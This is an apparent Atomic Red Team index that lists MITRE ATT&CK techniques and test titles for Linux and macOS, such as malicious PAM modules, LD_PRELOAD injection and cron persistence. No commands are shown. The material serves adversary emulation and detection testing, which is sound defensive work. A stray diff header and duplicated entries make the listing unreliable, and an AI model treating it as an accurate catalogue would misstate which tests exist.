- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.002 Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# reconnaissance
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.001 Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.004 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
@@ -688,119 +404,130 @@
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.001 Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# collection
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
